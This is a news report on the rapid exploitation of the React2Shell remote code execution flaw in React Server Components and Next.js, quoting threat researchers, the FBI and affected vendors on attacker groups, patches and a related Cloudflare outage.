When news of the maximum-severity vulnerability in the React open frameworks broke last week, cybersecurity vendors warned that the broad use of the software and the ease with which the security flaw could be abused likely meant it would be rapidly and widely abused. They weren’t wrong.

Multiple China-nexus threat groups like Earth Lamia and Jackpot Panda were actively trying to exploit the vulnerability within hours of its disclosure, according to Amazon Web Services (AWS), and Justin Moore, senior manager of threat intel research at Palo Alto Networks’ Unit 42 group, confirmed a day later that more than 30 organizations across a range of sectors were affected by the bug.

The Unit 42 researchers saw scanning for vulnerable remote code execution (RCE), attempted theft of AWS configuration and credential files, and downloaders being installed, and linked the activity to CL-STA-1015 – also known as UNC5174 – a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security, Moore said.

Efforts by cybercriminals to exploit the flaw – now called React2Shell and tracked as CVE-2025-55182, with a CVSS severity score of 10 – accelerated over the weekend, according to security researchers. In a report this week, Unit 42 analysts wrote that they’d detected exploitation efforts that add to what Moore said last week, to include attempts to install Cobalt Strike, malicious dropper scripts, cryptocurrency mining software, interactive webshells, installing and executing the NoodleRat backdoor, and the execution of SnowLight malware and VShell, a remote access trojan.

“The immediate and expansive exploitation of this vulnerability highlights the speed at which threat actors move to seize on opportunities,” the researchers wrote. “While we have noted China-nexus activity, the footprint of activity will encompass significant amounts of cybercriminal motivations as well.”

Faster Reactions by Threat Actors

Both the React team and Vercel, the developer of Next.js, issued fixes for RSC (versions 19.0.1, 19.1.2, and 19.2.1) and Next.js, but the key to the threat is that the vulnerability can be executed without authentication, and bad actors are getting faster at exploiting new security flaws.

Michael Bell, founder and CEO of Suzu Labs, said that “hours from disclosure to active exploitation by nation-state actors is the new normal, and it’s only going to accelerate. China-nexus groups like Earth Lamia and Jackpot Panda have industrialized their vulnerability response: they monitor disclosures, grab public PoCs – even broken ones—and spray them at scale before most organizations have finished reading the advisory.”

Bell added that AWS’s report that showed attackers debugging exploits in real-time against honeypots showed the bad actors aren’t just running automated scanning, saying that “it’s hands-on-keyboard operators racing to establish persistence before patches roll out.” That window between disclosure and weaponization will close further as hackers expand their use of AI to parse disclosures and generate code to exploit flaws.

Message from the Government

The FBI also weighed in, with Brett Leatherman, assistant director of the agency’s Cyber Division, urging security teams to apply the patches and review logs and endpoint telemetry for signs of threats.

“This is a pre-auth, single-request RCE,” Leatherman wrote on LinkedIn. “Successful exploitation allows an external actor to execute code on the application server, access secrets, and move further into cloud or enterprise environments. Current internet telemetry shows high-volume, automated exploitation attempts, often followed by encoded PowerShell, AMSI-bypass techniques, and other familiar post-exploitation behavior – giving defenders concrete signals to monitor.”

Widespread Use of RSC, Next.js

React2Shell is a vulnerability in React Server Components (RSC), a framework developers use to build user interfaces to allow React components to run exclusively on the server. The security flaw spilled into frameworks and libraries tied to RSC implementations, particularly Next.js. Both are broadly used, with Wiz noting that 39% of cloud environments contain instances of Next.js or React in versions vulnerable to React2Shell, and 44% have publicly exposed Next.js instances.

Like Unit 42, Wiz researchers this week wrote they’ve seen rapid exploitation efforts, with most attacks targeting such internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services.

The instances range from cloud-native initial access and reconnaissance and credential harvesting and cloud metadata access to containerized crypto-mining deployments to backdoors and post-exploitation frameworks.

Next.js Isn’t Only Framework at Risk

They also noted that Next.js likely was the initial primary focus for bad actors because it’s the most popular framework using RSC, which is enabled and exposed by default on all Next.js applications. Other non-Next.js platforms also likely will be in the threat groups’ crosshairs.

“In our internal research, we successfully executed code using this PoC [proof-of-concept] (with minor adjustments) on both Waku and Vite (with the RSC Plugin),” they wrote. “With only minor modifications to the PoC, we are confident that more frameworks are vulnerable and would require only very minor adjustments to be exploited as well.”

Cailin Condon, vice president of security research at VulnCheck, wrote last week that multiple POC RCE exploits were publicly available and that the vendor’s Canary Intelligence network was detecting hundreds of exploitation efforts.

“Broad, opportunistic scanning and exploitation are ongoing, and Vercel is offering large bounties for anyone who reports successful WAF [web application firewall] bypasses,” Condon wrote.

Bounty Offered

Over the weekend, Vercel said it is partnering with HackerOne to reward those who report successfully bypassing Vercel’s protections with bounties of $25,000 to $50,000.

Cloudflare said December 5 that a portion of its network experienced failures that affected about 28% of the HTTP traffic served by the company, thanks to React2Shell. However, the failures – which lasted about 25 minutes – weren’t due to an exploitation of the vulnerability.

“The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind,” Cloudflare CTO Dane Knecht wrote. “Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.”